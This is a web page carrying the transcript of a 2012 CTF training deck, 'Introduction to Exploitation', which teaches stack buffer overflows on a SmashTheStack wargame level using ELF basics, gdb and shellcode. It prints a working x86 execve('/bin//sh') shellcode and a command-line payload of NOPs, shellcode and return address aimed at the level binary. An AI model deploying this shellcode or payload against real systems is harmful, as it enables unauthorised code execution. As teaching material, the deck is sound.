Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Intro_Exp_post.pdf

lukesun629
November 21, 2012
2
9.2k

 Intro_Exp_post.pdf

lukesun629

November 21, 2012
Tweet

More Decks by lukesun629

See All by lukesun629
Blue-lotus Web security 培训
lukesun629
0
1.2k
SCAP protocol and FDCC protocol
lukesun629
0
310

Featured

See All Featured
GraphQLとの向き合い方2022年版
quramy
43
13k
Cheating the UX When There Is Nothing More to Optimize - PixelPioneers
stephaniewalter
280
13k
A Philosophy of Restraint
colly
203
16k
Git: the NoSQL Database
bkeepers
PRO
427
64k
Building Your Own Lightsaber
phodgson
103
6.1k
XXLCSS - How to scale CSS and keep your sanity
sugarenia
246
1.3M
What’s in a name? Adding method to the madness
productmarketing
PRO
22
3.1k
Java REST API Framework Comparison - PWX 2021
mraible
PRO
28
8.2k
Understanding Cognitive Biases in Performance Measurement
bluesmoon
26
1.4k
How to train your dragon (web standard)
notwaldorf
88
5.7k
Visualization
eitanlees
145
15k
Creating an realtime collaboration tool: Agile Flush - .NET Oxford
marcduiker
25
1.8k

Transcript

  1. Introduction to Exploitation kelwin <[email protected]> blue-lotus

  2. Basic Goals • Exploit basic buffer overflow by yourself –

    Understand basic memory vulnerabilities – Basic use of gdb – Basic use of shellcode

  3. IO SmashTheStack Level05.c

  4. ELF Format • Executable and Linkable Format • 3 main

    types of object files – relocatable file: gcc –c test.c => test.o(test.a) – executable file: gcc –o test test.c => test – shared object file: test.so • Parallel views – Linking View – Execution View

  5. ELF Header

  6. Section Header Table

  7. Program Header Table gcc: -z execstack

  8. About Stack • Region of memory managed with stack discipline

    • Grows toward lower addresses • Register %esp indicates lowest stack address – address of top element • Stack Operations – pushl -> %esp+4 – popl -> %esp-4 byte byte … byte byte %esp Stack Top Stack Bottom

  9. Calling Convention(cdecl) %ebp in caller’s caller 3 2 1 return

    address %ebp in caller

  10. Memory Layout(Linux X86) • Stack • Shared Libraries • Heap

    • Data(Global/Static) • Text For Kernal Stack shared libraries Heap Data Text Unused 0xC0000000 0x40000000 0x00000000 0x08048000 0xFFFFFFFF %esp

  11. Stack Frame arguments return address stack frame pointer [exception handlers]

    local variables callee saved registers For Kernal Stack shared libraries Heap Data Text Unused 0xC0000000 0x40000000 0x00000000 0x08048000 0xFFFFFFFF %ebp previous stack frame pointer %esp

  12. objdump –d level05

  13. objdump –d level05 char * strcpy ( char * destination,

    const char * source );

  14. objdump –d –j <section name>

  15. Buffer Overflow char **argv int argc return address previous %ebp

    char buf[128]

  16. Buffer Overflow char **argv int argc char buf[132~135] char buf[128~131]

    char buf[0~127]

  17. GDB • Starting GDB – gdb program + run [arglist]

    – gdb –args program [arglist] + run – attach pid • Stopping GDB – quit – Ctrl-d

  18. GDB • Breakpoints and Watchpoints – break function – break

    *addr – info break – clear function – delete/enable/disable [n] – watch expr – info watch

  19. GDB • Execution Control – continue – step – stepi

    – next – nexti

  20. GDB • Display – print [/f] expr • x hex

    • d signed decimal • u unsigned decimal • o octal • t binary • a address • c character • f floating point – info reg [rn]

  21. GDB • Display – x [/Nuf] expr • N count

    of units to display • u unit size – b bytes – h halfwords (two bytes) – w words (four bytes) – g giant words (eight bytes) • f printing format – s null-terminated string – i machine instructions – disassem [addr]

  22. GDB • demo – view arguments and environment variables –

    view stack structure – insert breakpoints and control execution

  23. Buffer Overflow Exploit char **argv int argc evil code address

    evil code evil code Contruct evil buffer: buf = evil_code + evil_code_address

  24. Buffer Overflow Exploit evil code evil code evil code address

    Useless buf Useless buf Contruct evil buffer: buf = evil_code + evil_code_address

  25. Shellcode • What is shellcode – A small piece of

    code used as the payload in the exploitation of a software vulnerability – Typically it starts a command shell from which the attacker can control the compromised machine • What we use here – We use execve system call to obtain a high- permission level shell

  26. Shellcode 0 //sh /bin 0 string syscall calling convention %eax=0xb

    %ebx=filename %ecx=argv %edx=envp %esi %edi %ebp %esp "/bin//sh" CLTD converts signed long word EAX to double word EDX:EAX int execve(const char *filename, char *const argv[], char *const envp[]);

  27. Shellcode

  28. Shellcode SHELLCODE = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e \x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"

  29. Exploit • Construct Attacking Buffer – buf = NOP+SHELLCODE+RET_ADDRESS •

    How to find return address – debuging – pattern_tool.py from metasploit • “Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3 Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7A c8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1A e2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2A”

  30. Practice 1 • ssh –p2222 111.111.111.111 • password: bl******* •

    capture the level05.flag • ./level05 $(python –c ‘print “\x90”* 50 + “\x31….\x80”+”\x90”*n+”\xff\xff\xff\xbf”*m’)

  31. More Vulnerabilities • Heap Overflow • Integer Overflow • Format

    String • Heap Spray We Need Your Presentations!

  32. Platform Defenses and More Exploitations • DEP/W^X – Return-to-libc/Return Oriented

    Programing (ROP) • ASLR – jmp esp/ret2ret/… Call For Presentations!

  33. How to learn • CTFs • Wargames – io smash

    the stack – exploit-excercises.com • Presentations • Open Courses

  34. RuCTFE 2012 • Call for participants! • 比赛时间:11月24日23:00~11月25日7:00 • 比赛规则:两轮攻防

    • 11月19日下午13:00 3-230模拟训练

  35. Practice 2 • ssh –p2222 111.111.111.111 • password: bl******* •

    capture the level07.flag